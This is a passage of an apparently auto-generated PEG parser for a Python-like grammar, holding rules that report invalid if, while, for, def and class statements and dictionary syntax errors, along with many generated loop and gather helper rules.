def invalid_class_pattern(self) -> Optional[NoReturn]:
# invalid_class_pattern: name_or_attr '(' invalid_class_argument_pattern
mark = self._mark()
if (
(name_or_attr := self.name_or_attr())
and
(literal := self.expect('('))
and
(a := self.invalid_class_argument_pattern())
):
return self . raise_syntax_error_known_range ( "positional patterns follow keyword patterns" , a [0] , a [- 1] )
self._reset(mark)
return None
@memoize
def invalid_class_argument_pattern(self) -> Optional[list]:
# invalid_class_argument_pattern: [positional_patterns ','] keyword_patterns ',' positional_patterns
mark = self._mark()
if (
(opt := self._tmp_193(),)
and
(keyword_patterns := self.keyword_patterns())
and
(literal := self.expect(','))
and
(a := self.positional_patterns())
):
return a
self._reset(mark)
return None
@memoize
def invalid_if_stmt(self) -> Optional[NoReturn]:
# invalid_if_stmt: 'if' named_expression NEWLINE | 'if' named_expression ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect('if'))
and
(named_expression := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return self . raise_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('if'))
and
(a_1 := self.named_expression())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'if' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_elif_stmt(self) -> Optional[NoReturn]:
# invalid_elif_stmt: 'elif' named_expression NEWLINE | 'elif' named_expression ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect('elif'))
and
(named_expression := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return self . raise_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('elif'))
and
(named_expression := self.named_expression())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'elif' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_else_stmt(self) -> Optional[NoReturn]:
# invalid_else_stmt: 'else' ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('else'))
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'else' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_while_stmt(self) -> Optional[NoReturn]:
# invalid_while_stmt: 'while' named_expression NEWLINE | 'while' named_expression ':' NEWLINE !INDENT
mark = self._mark()
if (
(literal := self.expect('while'))
and
(named_expression := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return self . store_syntax_error ( "expected ':'" )
self._reset(mark)
if (
(a := self.expect('while'))
and
(named_expression := self.named_expression())
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'while' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_for_stmt(self) -> Optional[NoReturn]:
# invalid_for_stmt: 'async'? 'for' star_targets 'in' star_expressions ':' NEWLINE !INDENT
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(a := self.expect('for'))
and
(star_targets := self.star_targets())
and
(literal := self.expect('in'))
and
(star_expressions := self.star_expressions())
and
(literal_1 := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after 'for' statement on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_def_raw(self) -> Optional[NoReturn]:
# invalid_def_raw: 'async'? 'def' NAME '(' params? ')' ['->' expression] ':' NEWLINE !INDENT
mark = self._mark()
if (
(opt := self.expect('async'),)
and
(a := self.expect('def'))
and
(name := self.name())
and
(literal := self.expect('('))
and
(opt_1 := self.params(),)
and
(literal_1 := self.expect(')'))
and
(opt_2 := self._tmp_194(),)
and
(literal_2 := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after function definition on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_class_def_raw(self) -> Optional[NoReturn]:
# invalid_class_def_raw: 'class' NAME ['(' arguments? ')'] ':' NEWLINE !INDENT
mark = self._mark()
if (
(a := self.expect('class'))
and
(name := self.name())
and
(opt := self._tmp_195(),)
and
(literal := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
self.negative_lookahead(self.expect, 'INDENT')
):
return self . raise_indentation_error ( f"expected an indented block after class definition on line {a.start[0]}" )
self._reset(mark)
return None
@memoize
def invalid_double_starred_kvpairs(self) -> Optional[None]:
# invalid_double_starred_kvpairs: ','.double_starred_kvpair+ ',' invalid_kvpair | expression ':' '*' bitwise_or | expression ':' &('}' | ',')
mark = self._mark()
if (
(_gather_196 := self._gather_196())
and
(literal := self.expect(','))
and
(invalid_kvpair := self.invalid_kvpair())
):
return None # pragma: no cover
self._reset(mark)
if (
(expression := self.expression())
and
(literal := self.expect(':'))
and
(a := self.expect('*'))
and
(bitwise_or := self.bitwise_or())
):
return self . store_syntax_error_starting_from ( "cannot use a starred expression in a dictionary value" , a )
self._reset(mark)
if (
(expression := self.expression())
and
(a := self.expect(':'))
and
self.positive_lookahead(self._tmp_198, )
):
return self . store_syntax_error_known_location ( "expression expected after dictionary key and ':'" , a )
self._reset(mark)
return None
@memoize
def invalid_kvpair(self) -> Optional[None]:
# invalid_kvpair: expression !(':') | expression ':' '*' bitwise_or | expression ':'
mark = self._mark()
if (
(a := self.expression())
and
self.negative_lookahead(self.expect, ':')
):
return self . _store_syntax_error ( "':' expected after dictionary key" , ( a . lineno , a . col_offset - 1 ) , ( a . end_lineno , a . end_col_offset , - 1 ) )
self._reset(mark)
if (
(expression := self.expression())
and
(literal := self.expect(':'))
and
(a := self.expect('*'))
and
(bitwise_or := self.bitwise_or())
):
return self . store_syntax_error_starting_from ( "cannot use a starred expression in a dictionary value" , a )
self._reset(mark)
if (
(expression := self.expression())
and
(a := self.expect(':'))
):
return self . store_syntax_error_known_location ( "expression expected after dictionary key and ':'" , a )
self._reset(mark)
return None
@memoize
def _loop0_1(self) -> Optional[Any]:
# _loop0_1: NEWLINE
mark = self._mark()
children = []
while (
(_newline := self.expect('NEWLINE'))
):
children.append(_newline)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_2(self) -> Optional[Any]:
# _loop0_2: NEWLINE
mark = self._mark()
children = []
while (
(_newline := self.expect('NEWLINE'))
):
children.append(_newline)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_3(self) -> Optional[Any]:
# _loop1_3: statement
mark = self._mark()
children = []
while (
(statement := self.statement())
):
children.append(statement)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_5(self) -> Optional[Any]:
# _loop0_5: ';' simple_stmt
mark = self._mark()
children = []
while (
(literal := self.expect(';'))
and
(elem := self.simple_stmt())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_4(self) -> Optional[Any]:
# _gather_4: simple_stmt _loop0_5
mark = self._mark()
if (
(elem := self.simple_stmt())
is not None
and
(seq := self._loop0_5())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_6(self) -> Optional[Any]:
# _tmp_6: 'import' | 'from'
mark = self._mark()
if (
(literal := self.expect('import'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('from'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_7(self) -> Optional[Any]:
# _tmp_7: 'def' | '@' | 'async'
mark = self._mark()
if (
(literal := self.expect('def'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('@'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('async'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_8(self) -> Optional[Any]:
# _tmp_8: 'class' | '@'
mark = self._mark()
if (
(literal := self.expect('class'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('@'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_9(self) -> Optional[Any]:
# _tmp_9: 'with' | 'async'
mark = self._mark()
if (
(literal := self.expect('with'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('async'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_10(self) -> Optional[Any]:
# _tmp_10: 'for' | 'async'
mark = self._mark()
if (
(literal := self.expect('for'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('async'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_11(self) -> Optional[Any]:
# _tmp_11: '=' annotated_rhs
mark = self._mark()
if (
(literal := self.expect('='))
and
(d := self.annotated_rhs())
):
return d
self._reset(mark)
return None
@memoize
def _tmp_12(self) -> Optional[Any]:
# _tmp_12: '(' single_target ')' | single_subscript_attribute_target
mark = self._mark()
if (
(literal := self.expect('('))
and
(b := self.single_target())
and
(literal_1 := self.expect(')'))
):
return b
self._reset(mark)
if (
(single_subscript_attribute_target := self.single_subscript_attribute_target())
):
return single_subscript_attribute_target
self._reset(mark)
return None
@memoize
def _tmp_13(self) -> Optional[Any]:
# _tmp_13: '=' annotated_rhs
mark = self._mark()
if (
(literal := self.expect('='))
and
(d := self.annotated_rhs())
):
return d
self._reset(mark)
return None
@memoize
def _loop0_15(self) -> Optional[Any]:
# _loop0_15: ',' NAME
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_14(self) -> Optional[Any]:
# _gather_14: NAME _loop0_15
mark = self._mark()
if (
(elem := self.name())
is not None
and
(seq := self._loop0_15())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_16(self) -> Optional[Any]:
# _loop1_16: (star_targets '=')
mark = self._mark()
children = []
while (
(_tmp_199 := self._tmp_199())
):
children.append(_tmp_199)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_17(self) -> Optional[Any]:
# _tmp_17: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def _tmp_18(self) -> Optional[Any]:
# _tmp_18: yield_expr | star_expressions
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(star_expressions := self.star_expressions())
):
return star_expressions
self._reset(mark)
return None
@memoize
def _tmp_19(self) -> Optional[Any]:
# _tmp_19: 'from' expression
mark = self._mark()
if (
(literal := self.expect('from'))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _loop0_21(self) -> Optional[Any]:
# _loop0_21: ',' NAME
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_20(self) -> Optional[Any]:
# _gather_20: NAME _loop0_21
mark = self._mark()
if (
(elem := self.name())
is not None
and
(seq := self._loop0_21())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_23(self) -> Optional[Any]:
# _loop0_23: ',' NAME
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_22(self) -> Optional[Any]:
# _gather_22: NAME _loop0_23
mark = self._mark()
if (
(elem := self.name())
is not None
and
(seq := self._loop0_23())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_24(self) -> Optional[Any]:
# _tmp_24: ';' | NEWLINE
mark = self._mark()
if (
(literal := self.expect(';'))
):
return literal
self._reset(mark)
if (
(_newline := self.expect('NEWLINE'))
):
return _newline
self._reset(mark)
return None
@memoize
def _tmp_25(self) -> Optional[Any]:
# _tmp_25: ',' expression
mark = self._mark()
if (
(literal := self.expect(','))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _loop0_26(self) -> Optional[Any]:
# _loop0_26: ('.' | '...')
mark = self._mark()
children = []
while (
(_tmp_200 := self._tmp_200())
):
children.append(_tmp_200)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_27(self) -> Optional[Any]:
# _loop1_27: ('.' | '...')
mark = self._mark()
children = []
while (
(_tmp_201 := self._tmp_201())
):
children.append(_tmp_201)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_29(self) -> Optional[Any]:
# _loop0_29: ',' import_from_as_name
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.import_from_as_name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_28(self) -> Optional[Any]:
# _gather_28: import_from_as_name _loop0_29
mark = self._mark()
if (
(elem := self.import_from_as_name())
is not None
and
(seq := self._loop0_29())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_30(self) -> Optional[Any]:
# _tmp_30: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(z := self.name())
):
return z . string
self._reset(mark)
return None
@memoize
def _loop0_32(self) -> Optional[Any]:
# _loop0_32: ',' dotted_as_name
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.dotted_as_name())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_31(self) -> Optional[Any]:
# _gather_31: dotted_as_name _loop0_32
mark = self._mark()
if (
(elem := self.dotted_as_name())
is not None
and
(seq := self._loop0_32())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_33(self) -> Optional[Any]:
# _tmp_33: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(z := self.name())
):
return z . string
self._reset(mark)
return None
@memoize
def _loop1_34(self) -> Optional[Any]:
# _loop1_34: decorator
mark = self._mark()
children = []
while (
(decorator := self.decorator())
):
children.append(decorator)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_35(self) -> Optional[Any]:
# _tmp_35: '@' dec_maybe_call NEWLINE
mark = self._mark()
if (
(literal := self.expect('@'))
and
(f := self.dec_maybe_call())
and
(_newline := self.expect('NEWLINE'))
):
return f
self._reset(mark)
return None
@memoize
def _tmp_36(self) -> Optional[Any]:
# _tmp_36: '@' named_expression NEWLINE
mark = self._mark()
if (
(literal := self.expect('@'))
and
(f := self.named_expression())
and
(_newline := self.expect('NEWLINE'))
):
return f
self._reset(mark)
return None
@memoize
def _tmp_37(self) -> Optional[Any]:
# _tmp_37: '(' arguments? ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(z := self.arguments(),)
and
(literal_1 := self.expect(')'))
):
return z
self._reset(mark)
return None
@memoize
def _tmp_38(self) -> Optional[Any]:
# _tmp_38: '->' expression
mark = self._mark()
if (
(literal := self.expect('->'))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _tmp_39(self) -> Optional[Any]:
# _tmp_39: '->' expression
mark = self._mark()
if (
(literal := self.expect('->'))
and
(z := self.expression())
):
return z
self._reset(mark)
return None
@memoize
def _loop0_40(self) -> Optional[Any]:
# _loop0_40: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_41(self) -> Optional[Any]:
# _loop0_41: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_42(self) -> Optional[Any]:
# _loop0_42: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_43(self) -> Optional[Any]:
# _loop1_43: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_44(self) -> Optional[Any]:
# _loop0_44: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_45(self) -> Optional[Any]:
# _loop1_45: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_46(self) -> Optional[Any]:
# _loop1_46: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_47(self) -> Optional[Any]:
# _loop1_47: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_48(self) -> Optional[Any]:
# _loop0_48: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_49(self) -> Optional[Any]:
# _loop1_49: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_50(self) -> Optional[Any]:
# _loop0_50: param_no_default
mark = self._mark()
children = []
while (
(param_no_default := self.param_no_default())
):
children.append(param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_51(self) -> Optional[Any]:
# _loop1_51: param_with_default
mark = self._mark()
children = []
while (
(param_with_default := self.param_with_default())
):
children.append(param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_52(self) -> Optional[Any]:
# _loop0_52: param_maybe_default
mark = self._mark()
children = []
while (
(param_maybe_default := self.param_maybe_default())
):
children.append(param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_53(self) -> Optional[Any]:
# _loop1_53: param_maybe_default
mark = self._mark()
children = []
while (
(param_maybe_default := self.param_maybe_default())
):
children.append(param_maybe_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_55(self) -> Optional[Any]:
# _loop0_55: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_54(self) -> Optional[Any]:
# _gather_54: with_item _loop0_55
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_55())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_57(self) -> Optional[Any]:
# _loop0_57: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_56(self) -> Optional[Any]:
# _gather_56: with_item _loop0_57
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_57())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_59(self) -> Optional[Any]:
# _loop0_59: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_58(self) -> Optional[Any]:
# _gather_58: with_item _loop0_59
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_59())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_61(self) -> Optional[Any]:
# _loop0_61: ',' with_item
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.with_item())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_60(self) -> Optional[Any]:
# _gather_60: with_item _loop0_61
mark = self._mark()
if (
(elem := self.with_item())
is not None
and
(seq := self._loop0_61())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_62(self) -> Optional[Any]:
# _tmp_62: ',' | ')' | ':'
mark = self._mark()
if (
(literal := self.expect(','))
):
return literal
self._reset(mark)
if (
(literal := self.expect(')'))
):
return literal
self._reset(mark)
if (
(literal := self.expect(':'))
):
return literal
self._reset(mark)
return None
@memoize
def _loop1_63(self) -> Optional[Any]:
# _loop1_63: except_block
mark = self._mark()
children = []
while (
(except_block := self.except_block())
):
children.append(except_block)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _tmp_64(self) -> Optional[Any]:
# _tmp_64: 'as' NAME
mark = self._mark()
if (
(literal := self.expect('as'))
and
(z := self.name())
):
return z . string
self._reset(mark)
return None
@memoize
def _loop1_65(self) -> Optional[Any]:
# _loop1_65: case_block
mark = self._mark()
children = []
while (
(case_block := self.case_block())
):
children.append(case_block)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_67(self) -> Optional[Any]:
# _loop0_67: '|' closed_pattern
mark = self._mark()
children = []
while (
(literal := self.expect('|'))
and
(elem := self.closed_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_66(self) -> Optional[Any]:
# _gather_66: closed_pattern _loop0_67
mark = self._mark()
if (
(elem := self.closed_pattern())
is not None
and
(seq := self._loop0_67())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_68(self) -> Optional[Any]:
# _tmp_68: '+' | '-'
mark = self._mark()
if (
(literal := self.expect('+'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('-'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_69(self) -> Optional[Any]:
# _tmp_69: '+' | '-'
mark = self._mark()
if (
(literal := self.expect('+'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('-'))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_70(self) -> Optional[Any]:
# _tmp_70: '.' | '(' | '='
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
return None
@memoize
def _tmp_71(self) -> Optional[Any]:
# _tmp_71: '.' | '(' | '='
mark = self._mark()
if (
(literal := self.expect('.'))
):
return literal
self._reset(mark)
if (
(literal := self.expect('('))
):
return literal
self._reset(mark)
if (
(literal := self.expect('='))
):
return literal
self._reset(mark)
return None
@memoize
def _loop0_73(self) -> Optional[Any]:
# _loop0_73: ',' maybe_star_pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.maybe_star_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_72(self) -> Optional[Any]:
# _gather_72: maybe_star_pattern _loop0_73
mark = self._mark()
if (
(elem := self.maybe_star_pattern())
is not None
and
(seq := self._loop0_73())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_75(self) -> Optional[Any]:
# _loop0_75: ',' key_value_pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.key_value_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_74(self) -> Optional[Any]:
# _gather_74: key_value_pattern _loop0_75
mark = self._mark()
if (
(elem := self.key_value_pattern())
is not None
and
(seq := self._loop0_75())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_76(self) -> Optional[Any]:
# _tmp_76: literal_expr | attr
mark = self._mark()
if (
(literal_expr := self.literal_expr())
):
return literal_expr
self._reset(mark)
if (
(attr := self.attr())
):
return attr
self._reset(mark)
return None
@memoize
def _loop0_78(self) -> Optional[Any]:
# _loop0_78: ',' pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_77(self) -> Optional[Any]:
# _gather_77: pattern _loop0_78
mark = self._mark()
if (
(elem := self.pattern())
is not None
and
(seq := self._loop0_78())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop0_80(self) -> Optional[Any]:
# _loop0_80: ',' keyword_pattern
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.keyword_pattern())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_79(self) -> Optional[Any]:
# _gather_79: keyword_pattern _loop0_80
mark = self._mark()
if (
(elem := self.keyword_pattern())
is not None
and
(seq := self._loop0_80())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_81(self) -> Optional[Any]:
# _loop1_81: (',' expression)
mark = self._mark()
children = []
while (
(_tmp_202 := self._tmp_202())
):
children.append(_tmp_202)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_82(self) -> Optional[Any]:
# _loop1_82: (',' star_expression)
mark = self._mark()
children = []
while (
(_tmp_203 := self._tmp_203())
):
children.append(_tmp_203)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_84(self) -> Optional[Any]:
# _loop0_84: ',' star_named_expression
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.star_named_expression())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_83(self) -> Optional[Any]:
# _gather_83: star_named_expression _loop0_84
mark = self._mark()
if (
(elem := self.star_named_expression())
is not None
and
(seq := self._loop0_84())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _loop1_85(self) -> Optional[Any]:
# _loop1_85: ('or' conjunction)
mark = self._mark()
children = []
while (
(_tmp_204 := self._tmp_204())
):
children.append(_tmp_204)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_86(self) -> Optional[Any]:
# _loop1_86: ('??' conjunction)
mark = self._mark()
children = []
while (
(_tmp_205 := self._tmp_205())
):
children.append(_tmp_205)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_87(self) -> Optional[Any]:
# _loop1_87: ('and' inversion)
mark = self._mark()
children = []
while (
(_tmp_206 := self._tmp_206())
):
children.append(_tmp_206)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_88(self) -> Optional[Any]:
# _loop1_88: compare_op_pipe_expression_pair
mark = self._mark()
children = []
while (
(compare_op_pipe_expression_pair := self.compare_op_pipe_expression_pair())
):
children.append(compare_op_pipe_expression_pair)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_90(self) -> Optional[Any]:
# _loop0_90: ',' slice
mark = self._mark()
children = []
while (
(literal := self.expect(','))
and
(elem := self.slice())
):
children.append(elem)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _gather_89(self) -> Optional[Any]:
# _gather_89: slice _loop0_90
mark = self._mark()
if (
(elem := self.slice())
is not None
and
(seq := self._loop0_90())
is not None
):
return [elem] + seq
self._reset(mark)
return None
@memoize
def _tmp_91(self) -> Optional[Any]:
# _tmp_91: ':' expression?
mark = self._mark()
if (
(literal := self.expect(':'))
and
(d := self.expression(),)
):
return d
self._reset(mark)
return None
@memoize
def _tmp_92(self) -> Optional[Any]:
# _tmp_92: tuple | group | genexp
mark = self._mark()
if (
(tuple := self.tuple())
):
return tuple
self._reset(mark)
if (
(group := self.group())
):
return group
self._reset(mark)
if (
(genexp := self.genexp())
):
return genexp
self._reset(mark)
return None
@memoize
def _tmp_93(self) -> Optional[Any]:
# _tmp_93: list | listcomp
mark = self._mark()
if (
(list := self.list())
):
return list
self._reset(mark)
if (
(listcomp := self.listcomp())
):
return listcomp
self._reset(mark)
return None
@memoize
def _tmp_94(self) -> Optional[Any]:
# _tmp_94: dict | set | dictcomp | setcomp
mark = self._mark()
if (
(dict := self.dict())
):
return dict
self._reset(mark)
if (
(set := self.set())
):
return set
self._reset(mark)
if (
(dictcomp := self.dictcomp())
):
return dictcomp
self._reset(mark)
if (
(setcomp := self.setcomp())
):
return setcomp
self._reset(mark)
return None
@memoize
def _tmp_95(self) -> Optional[Any]:
# _tmp_95: yield_expr | named_expression
mark = self._mark()
if (
(yield_expr := self.yield_expr())
):
return yield_expr
self._reset(mark)
if (
(named_expression := self.named_expression())
):
return named_expression
self._reset(mark)
return None
@memoize
def _loop0_96(self) -> Optional[Any]:
# _loop0_96: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_97(self) -> Optional[Any]:
# _loop0_97: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_98(self) -> Optional[Any]:
# _loop0_98: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_99(self) -> Optional[Any]:
# _loop1_99: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop0_100(self) -> Optional[Any]:
# _loop0_100: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_101(self) -> Optional[Any]:
# _loop1_101: lambda_param_with_default
mark = self._mark()
children = []
while (
(lambda_param_with_default := self.lambda_param_with_default())
):
children.append(lambda_param_with_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_102(self) -> Optional[Any]:
# _loop1_102: lambda_param_no_default
mark = self._mark()
children = []
while (
(lambda_param_no_default := self.lambda_param_no_default())
):
children.append(lambda_param_no_default)
mark = self._mark()
self._reset(mark)
return children
@memoize
def _loop1_103(self) -> Optional[Any]:
